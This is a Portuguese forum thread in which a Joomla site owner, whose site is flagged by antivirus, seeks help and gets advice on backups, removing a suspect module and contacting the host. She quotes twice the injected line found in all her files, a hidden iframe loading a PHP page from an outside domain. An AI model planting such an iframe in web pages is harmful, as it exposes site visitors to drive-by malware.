Forum Pplware

Versão Completa: Vírus no site em Joomla
Está de momento a ver uma versão reduzida do nosso conteúdo. Ver versão completa com o formato adequado.
Páginas: 1 2
Boa noite, tenho um site em joomla que “penso que foi atacado por virus”, demora imenso a carregar e o antivírus avisa de vírus. No código vi que aparece uma linha de código de um site de hotel, insere essa linha em todas as páginas de código.
Alguém já teve o mesmo problema?
Cumps
Crias-te o site de origem? Não foste buscar nada á internet já feito?

Assumindo que não é o teu computador que está infectado, para já sugiro que faças um backup do trabalho. Depois verifica as questões que coloquei.
Não criei de origem adaptei, fui buscar alguns módulos do joomla (um para calendário e outro chamado K2), eu desconfio deste ultimo modulo do K2, porque o site funcionava bem.
Vou fazer um backup do site no servidor…
Alguma maneira de eu poder correr o antivírus através do fttp???

Cumps
Para não perderes nada sugiro que faças o backup antes de tentares qualquer coisa.

Tenta desinstalar o módulo e vê se a "coisa" corre bem.

Servidor é teu, ou pagas pelo alojamento? Se pagas sugiro que entres em contacto com eles e vê o que dizem.

De qualquer maneira é sempre bom "ouvir" outras opiniões.
Antes demais obrigada e tens toda razão é sempre bom ouvir outras opiniões,

Já desinstalei o modulo mas continua na mesma, é pago alojamento, já tentei ligar mas parece que hoje não trabalham só segunda feira.
A linha que aparece em todos os ficheiro .html e php é esta:

<iframe src="http://hotels-globe.com/css/.del/index.php" width="10" border="1" height="10" style="visibility:hidden"></iframe><div align="center">
Ás tantas é um módulo com restrições de uso.
(02-12-2011 22:36)mygel Escreveu: [ -> ]Antes demais obrigada e tens toda razão é sempre bom ouvir outras opiniões,

Já desinstalei o modulo mas continua na mesma, é pago alojamento, já tentei ligar mas parece que hoje não trabalham só segunda feira.
A linha que aparece em todos os ficheiro .html e php é esta:

<iframe src="http://hotels-globe.com/css/.del/index.php" width="10" border="1" height="10" style="visibility:hidden"></iframe><div align="center">

Agora que voltei a ler o tópico é que reparei.
Continua na mesma? Como assim? O antivirus ainda acusa virus?
Se sim, e para despiste, sugiro que faças uma manutenção ao computador de onde estás a tentar aceder.
Boa noite, sim continua na mesma, o antivírus acusa vírus em qualquer pc que sé tente aceder ao site.
Existe alguma possibilidade de correr algum antivírus no site ou limpar a página?
(05-12-2011 21:52)mygel Escreveu: [ -> ]Boa noite, sim continua na mesma, o antivírus acusa vírus em qualquer pc que sé tente aceder ao site.
Existe alguma possibilidade de correr algum antivírus no site ou limpar a página?

Foi por isso que te disse que se pagas pelo servidor, para entrares em contacto com eles e expor a situação.

Experimenta desinstalar o módulo em causa, e faz o upload do site actualizado (sem o módulo) e vê no que dá.
O servidor é pago mas é daqueles manhosos estrangeiros, tentei ligar mas não sai do atendedor automático. Eu até queria mudar para um servidor nacional.
Já desinstalei o modulo em causa, continua na mesma, vou tentar fazer o upload do site atualizado.
Obrigado pela ajuda.
Páginas: 1 2
URL's de Referência